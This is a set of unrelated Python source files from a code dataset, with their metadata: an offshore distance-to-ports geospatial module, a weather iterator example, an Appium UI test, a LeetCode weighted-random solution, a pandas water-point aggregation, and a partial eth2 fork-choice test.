Parameters\n ----------\n excl_fpath: str\n Path to exclusions .h5 file with distance to coast layer\n input_dist_layer : str, optional\n Exclusions layer name with distance to coast values,\n by default 'dist_to_coast'\n\n Returns\n -------\n lat_lon : pandas.DataFrame\n Table mapping the offshore pixel coordinates (lat, lon) to their\n position (row, col) within the distance to shore array/layer/raster\n cost_arr : ndarray\n Cost array with offshore pixels set to 90 (pixel width) and\n onshore pixels set to -1.\n profile : dict\n Profile (transform, crs, etc.) 
of arr raster\n \"\"\"\n hsds = check_res_file(excl_fpath)[1]\n with ExclusionLayers(excl_fpath, hsds=hsds) as tif:\n profile = tif.profile\n cost_arr = tif[input_dist_layer]\n lat = tif['latitude'].astype(np.float32)\n lon = tif['longitude'].astype(np.float32)\n\n mask = cost_arr > 0\n cost_arr = np.where(mask, 90, -1).astype(np.int8)\n\n mask = mask.ravel()\n ids = np.arange(lat.size, dtype=np.uint32)[mask]\n row_len = lat.shape[1]\n lat = lat.ravel()[mask]\n lon = lon.ravel()[mask]\n del mask\n\n rows, cols = row_col_indices(ids, row_len)\n del ids\n del row_len\n\n lat_lon = pd.DataFrame({'latitude': lat,\n 'longitude': lon,\n 'row': rows,\n 'col': cols})\n\n return lat_lon, cost_arr, profile\n\n @staticmethod\n def _check_ports_coords(port_coords, lat_lon):\n \"\"\"\n Check port coordinates to make sure they are within the resource domain\n\n Parameters\n ----------\n port_coords : ndarray\n nx2 array of (lat, lon) port coordinates\n lat_lon : ndarray\n nx2 array of (lat, lon) offshore coordinates\n\n Returns\n -------\n check : ndarray\n Boolean array indicating which ports are outside (False) the\n resource domain.\n \"\"\"\n lat_min, lat_max = np.sort(lat_lon[:, 0])[[0, -1]]\n lon_min, lon_max = np.sort(lat_lon[:, 1])[[0, -1]]\n\n lat = port_coords[:, 0]\n check = lat < lat_min\n check |= lat > lat_max\n\n lon = port_coords[:, 1]\n check |= lon < lon_min\n check |= lon > lon_max\n\n if any(check):\n bad_coords = port_coords[check]\n msg = (\"Ports with coordinates ({}) are outside of the \"\n \"resource domain: (({}, {}), ({}, {})) and will not be used\"\n \" to compute the least cost distance!\"\n .format(bad_coords, lat_min, lon_min, lat_max, lon_max))\n logger.warning(msg)\n warn(msg)\n\n return ~check\n\n @staticmethod\n def _create_port_names(ports):\n \"\"\"\n Create port names from \"PORT_NAME\" and \"STATE\", confirm all names are\n unique\n\n Parameters\n ----------\n ports : geopandas.GeoDataFrame | pandas.DataFrame\n DataFrame of port locations and their mapping to the offshore\n pixels for least cost distance computation\n\n Returns\n -------\n ports : geopandas.GeoDataFrame | pandas.DataFrame\n DataFrame of port locations and their mapping to the offshore\n pixels for least cost distance computation with a unique port\n name added\n \"\"\"\n name = None\n state = None\n for c in ports.columns:\n if c.lower() == 'port_name':\n if name is not None:\n msg = ('Multiple potential \"port names\" were found: '\n '({}, {})!'.format(name, c))\n logger.error(msg)\n raise RuntimeError(msg)\n else:\n name = c.lower()\n\n if 'state' in c.lower():\n if state is not None:\n msg = ('Multiple potential \"states\" were found: '\n '({}, {})!'.format(state, c))\n logger.error(msg)\n raise RuntimeError(msg)\n\n if state is not None and name is not None:\n break\n\n ports['name'] = (ports['PORT_NAME'].astype(str) + '_'\n + ports['ps_STATE'].astype(str))\n counts = ports['name'].value_counts()\n if np.any(counts > 1):\n msg = ('Ports must have unique names! The following duplicate '\n 'names were provided: {}'.format(counts[counts > 1]))\n logger.error(msg)\n raise RuntimeError(msg)\n\n return ports\n\n @classmethod\n def _parse_ports(cls, ports, excl_fpath, input_dist_layer='dist_to_coast'):\n \"\"\"\n Load ports from disc. Can be provided as a shape, csv, or json file.\n In all cases the ports latitude and longitude coordinates must be\n provided. Map the ports locations to the nearest offshore pixel in the\n distance to coast layer/array/raster. 
Compute the distance from the\n ports actual position to the nearest offshore pixel.\n\n Parameters\n ----------\n ports : str\n Path to shape, csv, or json file containing ports to compute\n least cost distance to\n excl_fpath: str\n Path to exclusions .h5 file with distance to coast layer\n input_dist_layer : str, optional\n Exclusions layer name with distance to coast values,\n by default 'dist_to_coast'\n\n Returns\n -------\n ports : geopandas.GeoDataFrame | pandas.DataFrame\n DataFrame of port locations and their mapping to the offshore\n pixels for least cost distance computation\n cost_arr : ndarray\n Cost array with offshore pixels set to 90 (pixel width) and\n onshore pixels set to -1.\n profile : dict\n Profile (transform, crs, etc.) of arr raster\n \"\"\"\n if ports.endswith('.shp'):\n ports = gpd.read_file(ports, ignore_geometry=True)\n else:\n ports = parse_table(ports)\n\n pixels, cost_arr, profile = \\\n cls._parse_lat_lons(excl_fpath, input_dist_layer=input_dist_layer)\n lat_lon_cols = get_lat_lon_cols(pixels)\n pixel_coords = pixels[lat_lon_cols].values\n\n tree = cKDTree(pixel_coords) # pylint: disable=not-callable\n\n lat_lon_cols = get_lat_lon_cols(ports)\n port_coords = ports[lat_lon_cols].values.astype('float32')\n # remove ports that are outside pixel bounds\n mask = cls._check_ports_coords(port_coords, pixel_coords)\n port_coords = port_coords[mask]\n ports = ports.loc[mask]\n _, idx = tree.query(port_coords)\n\n pixels = pixels.iloc[idx]\n pixel_coords = pixel_coords[idx]\n\n ports['row'] = pixels['row'].values\n ports['col'] = pixels['col'].values\n ports['dist_to_pixel'] = coordinate_distance(port_coords, pixel_coords)\n\n ports = cls._create_port_names(ports)\n\n return ports, cost_arr, profile\n\n @classmethod\n def lc_dist_to_port(cls, cost_arr, port_idx, port_dist,\n geotiff=None, profile=None):\n \"\"\"\n Compute the least cost dist from the port coordinates to all\n offshore coordinates in km\n\n Parameters\n ----------\n cost_arr : ndarray\n Cost array with offshore pixels set to 90 (pixel width) and\n onshore pixels set to -1.\n port_idx : list | tuple | ndarray\n Port (row, col) index, used as starting point for least cost\n distance\n port_dist : float\n Distance from port to pixel that corresponds to port_idx in meters\n geotiff : str, optional\n Output geotiff file path to save least cost distance to ports,\n by default None\n profile : dict, optional\n Profile (transform, crs, etc.) 
of cost array raster, needed to\n write distance to ports array to geotiff, by default None\n\n Returns\n -------\n lc_dist : ndarray, optional\n Least cost distance from port to all offshore pixels in km\n \"\"\"\n try:\n ts = time.time()\n logger.debug('Port that is {:.4f} km from nearest offshore pixel '\n '{}.'.format(port_dist, port_idx))\n if not isinstance(port_idx, np.ndarray):\n port_idx = np.array(port_idx)\n\n if len(port_idx) == 2:\n port_idx = np.expand_dims(port_idx, 0)\n\n mcp = MCP_Geometric(cost_arr)\n lc_dist = mcp.find_costs(starts=port_idx)[0].astype('float32')\n lc_dist /= 1000\n lc_dist += port_dist\n\n lc_dist[cost_arr == -1] = -1\n\n tt = (time.time() - ts) / 60\n logger.debug('- Least cost distance computed in {:.4f} minutes'\n .format(tt))\n if geotiff is not None:\n logger.debug('Saving least cost distance to port to '\n f'{geotiff}')\n msg = ('Profile is needed to write least cost distance to '\n 'ports to {}!'.format(geotiff))\n assert profile is not None, msg\n ExclusionsConverter.write_geotiff(geotiff, profile, lc_dist)\n else:\n return lc_dist\n except Exception:\n logger.exception('- Error computing least cost distance to port!')\n\n def distance_to_ports(self, out_dir, max_workers=1, replace=False):\n \"\"\"\n Compute the least cost distance from each offshore pixel to the nearest\n port in km\n\n Parameters\n ----------\n out_dir : str\n Directory to save distance to port geotiffs to.\n max_workers : int, optional\n Number of workers to use for distance to port computation, if 1 run in\n serial, if > 1 run in parallel with that many workers, if None\n run in parallel on all available cores, by default 1\n replace : bool, optional\n Flag to replace existing ports geotiffs, by default False\n \"\"\"\n if max_workers is None:\n max_workers = os.cpu_count()\n\n f_name = name = os.path.basename(self._ports_fpath).split('.')[0]\n if max_workers > 1:\n logger.info('Computing least cost distance to ports in parallel '\n 'using {} workers'.format(max_workers))\n loggers = [__name__, 'reVX']\n with SpawnProcessPool(max_workers=max_workers,\n loggers=loggers) as exe:\n futures = []\n for _, port in self.ports.iterrows():\n name = port['name'].replace(' ', '_')\n geotiff = '{}-{}.tif'.format(f_name, name)\n geotiff = os.path.join(out_dir, geotiff)\n if os.path.exists(geotiff) and not replace:\n msg = ('{} already exists and will be skipped! 
To '\n 'replace it set \"replace=True\"'\n .format(geotiff))\n logger.warning(msg)\n warn(msg)\n else:\n logger.debug('Computing least cost distance to {}'\n .format(name))\n port_idx = port[['row', 'col']].values\n port_dist = port['dist_to_pixel']\n future = exe.submit(\n self.lc_dist_to_port, self.cost_arr,\n port_idx, port_dist, geotiff=geotiff,\n profile=self._profile)\n futures.append(future)\n\n for i, future in enumerate(as_completed(futures)):\n logger.debug('Computed least cost distance for {} of {} '\n 'ports'.format((i + 1), len(futures)))\n log_mem(logger)\n else:\n logger.info('Computing least cost distance to ports in serial')\n for i, port in self.ports.iterrows():\n name = port['name'].replace(' ', '_')\n geotiff = '{}-{}.tif'.format(f_name, name)\n geotiff = os.path.join(out_dir, geotiff)\n if os.path.exists(geotiff) and not replace:\n msg = ('{} already exists and will be skipped! To '\n 'replace it set \"replace=True\"'\n .format(geotiff))\n logger.warning(msg)\n warn(msg)\n else:\n logger.debug('Computing least cost distance to {}'\n .format(name))\n port_idx = port[['row', 'col']].values\n port_dist = port['dist_to_pixel']\n self.lc_dist_to_port(\n self.cost_arr, port_idx, port_dist, geotiff=geotiff,\n profile=self._profile)\n logger.debug('Computed least cost distance for {} of {} '\n 'ports'.format((i + 1), len(self.ports)))\n log_mem(logger)\n\n @classmethod\n def run(cls, ports, excl_fpath, out_dir, input_dist_layer='dist_to_coast',\n max_workers=1, replace=False):\n \"\"\"\n Compute the least cost distance from offshore pixels to port\n locations in km. The distance to coast exclusion layer will be used to\n calculate least cost paths around land masses and other such\n obstructions. Produces the least cost distance from each offshore\n pixel to the nearest port. If a distance to port layer already exists\n it can be updated with the least cost distance to new ports.\n\n Parameters\n ----------\n ports : str\n Path to shape, csv, or json file containing ports to compute\n least cost distance to\n excl_fpath: str\n Path to exclusions .h5 file with distance to coast layer. Will also\n be the file into which the least cost distance to port is saved.\n out_dir : str\n Directory to save distance to port geotiffs to.\n input_dist_layer : str, optional\n Exclusions layer with distance to coast values,\n by default 'dist_to_coast'\n max_workers : int, optional\n Number of workers to use for distance to port computation, if 1 run in\n serial, if > 1 run in parallel with that many workers, if None\n run in parallel on all available cores, by default 1\n replace : bool, optional\n Flag to replace existing ports geotiffs, by default False\n \"\"\"\n logger.info('Computing least cost distance to ports in {}'\n .format(ports))\n dtp = cls(ports, excl_fpath, input_dist_layer=input_dist_layer)\n\n dtp.distance_to_ports(out_dir, max_workers=max_workers,\n replace=replace)\n", "sub_path": "reVX/offshore/dist_to_ports.py", "file_name": "dist_to_ports.py", "file_ext": "py", "file_size_in_byte": 18228, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "logging.getLogger", "line_number": 24, "usage_type": "call"}, {"api_name": "reVX.utilities.utilities.log_versions", "line_number": 53, "usage_type": "call"}, {"api_name": "rex.utilities.loggers.log_mem", "line_number": 58, "usage_type": "call"}, {"api_name": "rex.utilities.utilities.check_res_file", "line_number": 113, "usage_type": "call"}, {"api_name": "reV.handlers.exclusions.ExclusionLayers", "line_number": 114, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 117, "usage_type": "attribute"}, {"api_name": "numpy.float32", "line_number": 118, "usage_type": "attribute"}, {"api_name": "numpy.where", "line_number": 121, "usage_type": "call"}, {"api_name": "numpy.int8", "line_number": 121, "usage_type": "attribute"}, {"api_name": "numpy.arange", "line_number": 124, "usage_type": "call"}, {"api_name": "numpy.uint32", "line_number": 124, "usage_type": "attribute"}, {"api_name": "rex.utilities.utilities.row_col_indices", "line_number": 130, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 134, "usage_type": "call"}, {"api_name": "numpy.sort", "line_number": 159, "usage_type": "call"}, {"api_name": "numpy.sort", "line_number": 160, "usage_type": "call"}, {"api_name": "warnings.warn", "line_number": 177, "usage_type": "call"}, 
{"api_name": "numpy.any", "line_number": 225, "usage_type": "call"}, {"api_name": "geopandas.read_file", "line_number": 265, "usage_type": "call"}, {"api_name": "rex.utilities.utilities.parse_table", "line_number": 267, "usage_type": "call"}, {"api_name": "rex.utilities.utilities.get_lat_lon_cols", "line_number": 271, "usage_type": "call"}, {"api_name": "scipy.spatial.cKDTree", "line_number": 274, "usage_type": "call"}, {"api_name": "rex.utilities.utilities.get_lat_lon_cols", "line_number": 276, "usage_type": "call"}, {"api_name": "reVX.utilities.utilities.coordinate_distance", "line_number": 289, "usage_type": "call"}, {"api_name": "time.time", "line_number": 325, "usage_type": "call"}, {"api_name": "numpy.ndarray", "line_number": 328, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 329, "usage_type": "call"}, {"api_name": "numpy.expand_dims", "line_number": 332, "usage_type": "call"}, {"api_name": "skimage.graph.MCP_Geometric", "line_number": 334, "usage_type": "call"}, {"api_name": "time.time", "line_number": 341, "usage_type": "call"}, {"api_name": "reVX.utilities.ExclusionsConverter.write_geotiff", "line_number": 350, "usage_type": "call"}, {"api_name": "reVX.utilities.ExclusionsConverter", "line_number": 350, "usage_type": "name"}, {"api_name": "os.cpu_count", "line_number": 373, "usage_type": "call"}, {"api_name": "os.path.basename", "line_number": 375, "usage_type": "call"}, {"api_name": "os.path", "line_number": 375, "usage_type": "attribute"}, {"api_name": "rex.utilities.execution.SpawnProcessPool", "line_number": 380, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 386, "usage_type": "call"}, {"api_name": "os.path", "line_number": 386, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 387, "usage_type": "call"}, {"api_name": "os.path", "line_number": 387, "usage_type": "attribute"}, {"api_name": "warnings.warn", "line_number": 392, "usage_type": "call"}, {"api_name": "concurrent.futures.as_completed", "line_number": 404, "usage_type": "call"}, {"api_name": "rex.utilities.loggers.log_mem", "line_number": 407, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 413, "usage_type": "call"}, {"api_name": "os.path", "line_number": 413, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 414, "usage_type": "call"}, {"api_name": "os.path", "line_number": 414, "usage_type": "attribute"}, {"api_name": "warnings.warn", "line_number": 419, "usage_type": "call"}, {"api_name": "rex.utilities.loggers.log_mem", "line_number": 430, "usage_type": "call"}]} +{"seq_id": "474146757", "text": "#!/usr/bin/env python3\n# coding=utf-8\n# 抓取天气预报,实现用时访问的策略,即用迭代器,而不是简单的for,避免了占用大量内存,显示慢\n# for循环的本质就是先生成一个迭代对象,然后不断地调用next()\n# 下面的例子网站,点击后会自动下载一个文件,Json格式,用r.json()转换为python的字典格式\n# 要求:从网站抓取需要的城市气温信息,并依次显示;\n# 问题:如果一次抓取所有城市天气再显示,显示第一个城市气温时,有很高的延时,并且浪费存储空间;\n# 期望从‘用时访问’的策略,并且能把所有城市气温装到一个对象里,可用for语句进行迭代。如何实现?\n# 方案:\n# 把一个类作为一个迭代器使用 需要在类中实现两个方法 __iter__() 与 __next__() 。\n#  __iter__() 方法返回一个特殊的迭代器对象, 这个迭代器对象实现了 __next__() 方法并通过 StopIteration 异常标识迭代的完成。\n#  __next__() 方法(Python 2 里是 next())会返回下一个迭代器对象。\n\n# 这个例子可以取代34那个例子,我参考网上例子修改的\nimport requests\n\nclass WeatherIterator(object):\n def __init__(self, cities):\n self.cities = cities\n self.index = 0\n\n def __iter__(self):\n # 报错:Can't instantiate abstract class WeatherIterator with abstract methods __next__,\n # 即:不能用抽象的方法实例化抽象类WeatherIterator ——— 将next方法改为__next__()方法;\n return self\n\n def get_weather(self, city):\n r = 
requests.get(u'http://wthrcdn.etouch.cn/weather_mini?city=' + city)\n data = r.json()['data']['forecast'][0]\n return '%s: %s, %s' % (city, data['low'], data['high'])\n\n def __next__(self):\n if self.index == len(self.cities): # 迭代的结束条件必须有,否则就是死循环\n raise StopIteration\n # 正常迭代情况,即每次迭代出一个城市的气温信息;self.cities[self.index],得到需要的城市名字\n city = self.cities[self.index]\n self.index += 1\n return self.get_weather(city)\n\n\nif __name__ == '__main__':\n for x in WeatherIterator([u'北京', u'上海', u'广州', u'长春']):\n print(x)\n\n\n\n", "sub_path": "01_Python_Basics/40-iterator-class.py", "file_name": "40-iterator-class.py", "file_ext": "py", "file_size_in_byte": 2321, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "requests.get", "line_number": 28, "usage_type": "call"}]} +{"seq_id": "308099254", "text": "'''\r\nCreated on 2018年6月19日\r\n\r\n@author: admin\r\n'''\r\nimport unittest\r\nfrom PO import MenuPage\r\nfrom selenium import webdriver\r\nfrom appium import webdriver\r\nfrom Public import driver\r\nclass Test(unittest.TestCase):\r\n\r\n\r\n def setUp(self):\r\n self.driver=webdriver.Remote('http://127.0.0.1:4723/wd/hub',driver.MyDriver.desired_caps)\r\n\r\n\r\n def tearDown(self):\r\n self.driver.quit()\r\n\r\n\r\n def test_replay(self):\r\n menu=MenuPage.menu_page(self.driver)\r\n menu.click_menbtn()\r\n menu.click_replay()\r\n if menu.get_replay_title()=='回放 ':\r\n print(\"成功跳转回放页 :\"+menu.get_replay_title())\r\n\r\n\r\nif __name__ == \"__main__\":\r\n #import sys;sys.argv = ['', 'Test.testName']\r\n unittest.main()", "sub_path": "Testcase/test_replay.py", "file_name": "test_replay.py", "file_ext": "py", "file_size_in_byte": 757, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "unittest.TestCase", "line_number": 11, "usage_type": "attribute"}, {"api_name": "appium.webdriver.Remote", "line_number": 15, "usage_type": "call"}, {"api_name": "appium.webdriver", "line_number": 15, "usage_type": "name"}, {"api_name": "Public.driver.MyDriver", "line_number": 15, "usage_type": "attribute"}, {"api_name": "Public.driver", "line_number": 15, "usage_type": "name"}, {"api_name": "PO.MenuPage.menu_page", "line_number": 23, "usage_type": "call"}, {"api_name": "PO.MenuPage", "line_number": 23, "usage_type": "name"}, {"api_name": "unittest.main", "line_number": 32, "usage_type": "call"}]} +{"seq_id": "273781904", "text": "import random\nfrom typing import List\n\n\nclass Solution:\n\n def __init__(self, w: List[int]):\n self.arr = [0]\n for item in w:\n self.arr.append(self.arr[-1] + item)\n\n def pickIndex(self) -> int:\n x = random.random() * self.arr[-1]\n p1, p2 = 0, len(self.arr) - 1\n\n while p1 <= p2:\n mid = (p2 - p1) // 2 + p1\n if self.arr[mid] <= x < self.arr[mid + 1]:\n return mid\n elif self.arr[mid] > x:\n p2 = mid - 1\n else:\n p1 = mid + 1\n\n return -1\n\n\nif __name__ == \"__main__\":\n operations = [\"Solution\", \"pickIndex\", \"pickIndex\", \"pickIndex\", \"pickIndex\", \"pickIndex\"]\n values = [[[1, 3]], [1], [1], [1], [0], [1]]\n random.seed(10) # I've picked this randomly\n sol = None\n for op, v in zip(operations, values):\n if op == \"Solution\":\n sol = Solution(v[0])\n elif op == \"pickIndex\":\n print(sol.pickIndex(), '==', v[0])\n", "sub_path": "leetcode/p0528_random_pick_with_weight/my_attempt.py", "file_name": "my_attempt.py", "file_ext": "py", "file_size_in_byte": 1000, "program_lang": "python", "lang": "en", "doc_type": "code", 
"dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "typing.List", "line_number": 7, "usage_type": "name"}, {"api_name": "random.random", "line_number": 13, "usage_type": "call"}, {"api_name": "random.seed", "line_number": 31, "usage_type": "call"}]} +{"seq_id": "38339006", "text": "import pandas as pd\nimport simplejson as json\n\ndef calculate(url):\n \"\"\"\n This function outlined below downloads and computes the aggregation of functional and non-functional water sources\n per community. The result is merged with the total number of functional water sources in all communities.\n Additionally, a ranking is based on the percentage of faulty water sources per community.\n \"\"\"\n df = pd.read_json(url)\n df = df[['water_functioning', 'communities_villages']]\n df = df.groupby(['communities_villages', 'water_functioning']).size().unstack()\n df = df.fillna(0)\n\n df['total'] = df['yes'] + df['no']\n df['fault_percentage'] = df['no'] / df['total']\n df['ranking'] = df['fault_percentage'].rank(ascending=False)\n\n total_functional = df['yes'].sum()\n df = df.rename(columns={'yes': 'functional', 'no':'non_functional'})\n df = df[['functional', 'non_functional', 'total', 'ranking']]\n records = df.to_json(orient='index')\n result = '{\"number_functional\": %s, \"communities\": %s}' % (total_functional, records)\n return json.loads(result)\n\n\ndata = calculate('https://raw.githubusercontent.com/onaio/ona-tech/master/data/water_points.json')\nprint(data['number_functional'])\nprint(data['communities'])\n\n\n\n\n", "sub_path": "solution.py", "file_name": "solution.py", "file_ext": "py", "file_size_in_byte": 1273, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "pandas.read_json", "line_number": 10, "usage_type": "call"}, {"api_name": "simplejson.loads", "line_number": 24, "usage_type": "call"}]} +{"seq_id": "136363834", "text": "import random\n\nfrom eth_utils import to_dict\nfrom eth_utils.toolz import (\n first,\n keyfilter,\n merge,\n merge_with,\n partition,\n second,\n sliding_window,\n)\nimport pytest\n\nfrom eth2._utils import bitfield\nfrom eth2.beacon.committee_helpers import (\n get_committee_count_at_slot,\n get_committee_count_per_slot_at_epoch,\n iterate_committees_at_epoch,\n iterate_committees_at_slot,\n)\nfrom eth2.beacon.epoch_processing_helpers import get_attesting_indices\nfrom eth2.beacon.fork_choice.lmd_ghost import (\n Store,\n _balance_for_validator,\n lmd_ghost_scoring,\n score_block_by_root,\n)\nfrom eth2.beacon.helpers import compute_epoch_at_slot, compute_start_slot_at_epoch\nfrom eth2.beacon.types.attestation_data import AttestationData\nfrom eth2.beacon.types.attestations import Attestation\nfrom eth2.beacon.types.blocks import BeaconBlock\nfrom eth2.beacon.types.checkpoints import Checkpoint\n\n\n# TODO(ralexstokes) merge this and next into tools/builder\n@to_dict\ndef _mk_attestation_inputs_in_epoch(epoch, state, config):\n for committee, committee_index, slot in iterate_committees_at_epoch(\n state, epoch, config\n ):\n if not committee:\n # empty committee this slot\n continue\n\n attestation_data = AttestationData(\n slot=slot, index=committee_index, target=Checkpoint(epoch=epoch)\n )\n committee_size = len(committee)\n aggregation_bits = bitfield.get_empty_bitfield(committee_size)\n for index in range(committee_size):\n aggregation_bits = bitfield.set_voted(aggregation_bits, index)\n for index in committee:\n yield (\n index,\n (attestation_data.slot, (aggregation_bits, 
attestation_data)),\n )\n\n\ndef _mk_attestations_for_epoch_by_count(\n number_of_committee_samples, epoch, state, config\n):\n results = {}\n for _ in range(number_of_committee_samples):\n sample = _mk_attestation_inputs_in_epoch(epoch, state, config)\n results = merge(results, sample)\n return results\n\n\ndef _extract_attestations_from_index_keying(values):\n results = ()\n for value in values:\n aggregation_bits, data = second(value)\n attestation = Attestation(aggregation_bits=aggregation_bits, data=data)\n if attestation not in results:\n results += (attestation,)\n return results\n\n\ndef _keep_by_latest_slot(values):\n \"\"\"\n we get a sequence of (Slot, (Bitfield, AttestationData))\n and return the AttestationData with the highest slot\n \"\"\"\n return max(values, key=first)[1][1]\n\n\ndef _find_collision(state, config, validator_index, epoch):\n \"\"\"\n Given a target epoch, make the attestation expected for the\n validator w/ the given ``validator_index``.\n \"\"\"\n for committee, committee_index, slot in iterate_committees_at_epoch(\n state, epoch, config\n ):\n if validator_index in committee:\n # TODO(ralexstokes) refactor w/ tools/builder\n attestation_data = AttestationData(\n slot=slot, index=committee_index, target=Checkpoint(epoch=epoch)\n )\n committee_count = len(committee)\n aggregation_bits = bitfield.get_empty_bitfield(committee_count)\n for i in range(committee_count):\n aggregation_bits = bitfield.set_voted(aggregation_bits, i)\n\n return {\n index: (slot, (aggregation_bits, attestation_data))\n for index in committee\n }\n else:\n raise Exception(\"should have found a duplicate validator\")\n\n\ndef _introduce_collisions(all_attestations_by_index, state, config):\n \"\"\"\n Find some attestations for later epochs for the validators\n that are current attesting in each source of attestation.\n \"\"\"\n collisions = (all_attestations_by_index[0],)\n for src, dst in sliding_window(2, all_attestations_by_index):\n if not src:\n # src can be empty at low validator count\n collisions += (dst,)\n continue\n src_index = random.choice(list(src.keys()))\n src_val = src[src_index]\n src_slot, _ = src_val\n src_epoch = compute_epoch_at_slot(src_slot, config.SLOTS_PER_EPOCH)\n dst_epoch = src_epoch + 1\n\n collision = _find_collision(\n state, config, validator_index=src_index, epoch=dst_epoch\n )\n collisions += (merge(dst, collision),)\n return collisions\n\n\ndef _get_committee_count(state, epoch, config):\n return (\n get_committee_count_per_slot_at_epoch(\n state,\n epoch,\n config.MAX_COMMITTEES_PER_SLOT,\n config.SLOTS_PER_EPOCH,\n config.TARGET_COMMITTEE_SIZE,\n )\n * config.SLOTS_PER_EPOCH\n )\n\n\n@pytest.mark.parametrize(\n (\"validator_count\",),\n [\n (8,), # low number of validators\n (128,), # medium number of validators\n # NOTE: the test at 1024 count takes too long :(\n (256,), # high number of validators\n ],\n)\n@pytest.mark.parametrize((\"collisions_from_another_epoch\",), [(True,), (False,)])\ndef test_store_get_latest_attestation(\n genesis_state, empty_attestation_pool, config, collisions_from_another_epoch\n):\n \"\"\"\n Given some attestations across the various sources, can we\n find the latest ones for each validator?\n \"\"\"\n some_epoch = 3\n state = genesis_state.copy(\n slot=compute_start_slot_at_epoch(some_epoch, config.SLOTS_PER_EPOCH)\n )\n previous_epoch = state.previous_epoch(config.SLOTS_PER_EPOCH, config.GENESIS_EPOCH)\n previous_epoch_committee_count = _get_committee_count(state, previous_epoch, config)\n\n current_epoch = 
state.current_epoch(config.SLOTS_PER_EPOCH)\n current_epoch_committee_count = _get_committee_count(state, current_epoch, config)\n\n next_epoch = state.next_epoch(config.SLOTS_PER_EPOCH)\n next_epoch_committee_count = _get_committee_count(state, next_epoch, config)\n\n number_of_committee_samples = 4\n assert number_of_committee_samples <= previous_epoch_committee_count\n assert number_of_committee_samples <= current_epoch_committee_count\n assert number_of_committee_samples <= next_epoch_committee_count\n\n # prepare samples from previous epoch\n previous_epoch_attestations_by_index = _mk_attestations_for_epoch_by_count(\n number_of_committee_samples, previous_epoch, state, config\n )\n previous_epoch_attestations = _extract_attestations_from_index_keying(\n previous_epoch_attestations_by_index.values()\n )\n\n # prepare samples from current epoch\n current_epoch_attestations_by_index = _mk_attestations_for_epoch_by_count(\n number_of_committee_samples, current_epoch, state, config\n )\n current_epoch_attestations_by_index = keyfilter(\n lambda index: index not in previous_epoch_attestations_by_index,\n current_epoch_attestations_by_index,\n )\n current_epoch_attestations = _extract_attestations_from_index_keying(\n current_epoch_attestations_by_index.values()\n )\n\n # prepare samples for pool, taking half from the current epoch and half from the next epoch\n pool_attestations_in_current_epoch_by_index = _mk_attestations_for_epoch_by_count(\n number_of_committee_samples // 2, current_epoch, state, config\n )\n pool_attestations_in_next_epoch_by_index = _mk_attestations_for_epoch_by_count(\n number_of_committee_samples // 2, next_epoch, state, config\n )\n pool_attestations_by_index = merge(\n pool_attestations_in_current_epoch_by_index,\n pool_attestations_in_next_epoch_by_index,\n )\n pool_attestations_by_index = keyfilter(\n lambda index: (\n index not in previous_epoch_attestations_by_index\n or index not in current_epoch_attestations_by_index\n ),\n pool_attestations_by_index,\n )\n pool_attestations = _extract_attestations_from_index_keying(\n pool_attestations_by_index.values()\n )\n\n all_attestations_by_index = (\n previous_epoch_attestations_by_index,\n current_epoch_attestations_by_index,\n pool_attestations_by_index,\n )\n\n if collisions_from_another_epoch:\n (\n previous_epoch_attestations_by_index,\n current_epoch_attestations_by_index,\n pool_attestations_by_index,\n ) = _introduce_collisions(all_attestations_by_index, state, config)\n\n previous_epoch_attestations = _extract_attestations_from_index_keying(\n previous_epoch_attestations_by_index.values()\n )\n current_epoch_attestations = _extract_attestations_from_index_keying(\n current_epoch_attestations_by_index.values()\n )\n pool_attestations = _extract_attestations_from_index_keying(\n pool_attestations_by_index.values()\n )\n\n # build expected results\n expected_index = merge_with(\n _keep_by_latest_slot,\n previous_epoch_attestations_by_index,\n current_epoch_attestations_by_index,\n pool_attestations_by_index,\n )\n\n # ensure we get the expected results\n state = state.copy(\n previous_epoch_attestations=previous_epoch_attestations,\n current_epoch_attestations=current_epoch_attestations,\n )\n\n pool = empty_attestation_pool\n for attestation in pool_attestations:\n pool.add(attestation)\n\n chain_db = None # not relevant for this test\n store = Store(chain_db, state, pool, BeaconBlock, config)\n\n # sanity check\n assert expected_index.keys() == store._attestation_index.keys()\n\n for validator_index in 
range(len(state.validators)):\n expected_attestation_data = expected_index.get(validator_index, None)\n stored_attestation_data = store._get_latest_attestation(validator_index)\n assert expected_attestation_data == stored_attestation_data\n\n\ndef _mk_block(block_params, slot, parent, block_offset):\n return BeaconBlock(**block_params).copy(\n slot=slot,\n parent_root=parent.signing_root,\n # mix in something unique\n state_root=block_offset.to_bytes(32, byteorder=\"big\"),\n )\n\n\ndef _build_block_tree(\n block_params, root_block, base_slot, forking_descriptor, forking_asymmetry, config\n):\n \"\"\"\n build a block tree according to the data in ``forking_descriptor``, starting at\n the block with root ``base_root``.\n \"\"\"\n tree = [[root_block]]\n for slot_offset, block_count in enumerate(forking_descriptor):\n slot = base_slot + slot_offset\n blocks = []\n for parent in tree[-1]:\n if forking_asymmetry:\n if random.choice([True, False]):\n continue\n for block_offset in range(block_count):\n block = _mk_block(block_params, slot, parent, block_offset)\n blocks.append(block)\n tree.append(blocks)\n # other code written w/ expectation that root is not in the tree\n tree.pop(0)\n return tree\n\n\ndef _iter_block_tree_by_slot(tree):\n for level in tree:\n yield level\n\n\ndef _iter_block_level_by_block(level):\n for block in level:\n yield block\n\n\ndef _iter_block_tree_by_block(tree):\n for level in _iter_block_tree_by_slot(tree):\n for block in _iter_block_level_by_block(level):\n yield block\n\n\ndef _get_committees(state, target_slot, config, sampling_fraction):\n committees_per_slot = get_committee_count_at_slot(\n state,\n target_slot,\n config.MAX_COMMITTEES_PER_SLOT,\n config.SLOTS_PER_EPOCH,\n config.TARGET_COMMITTEE_SIZE,\n )\n 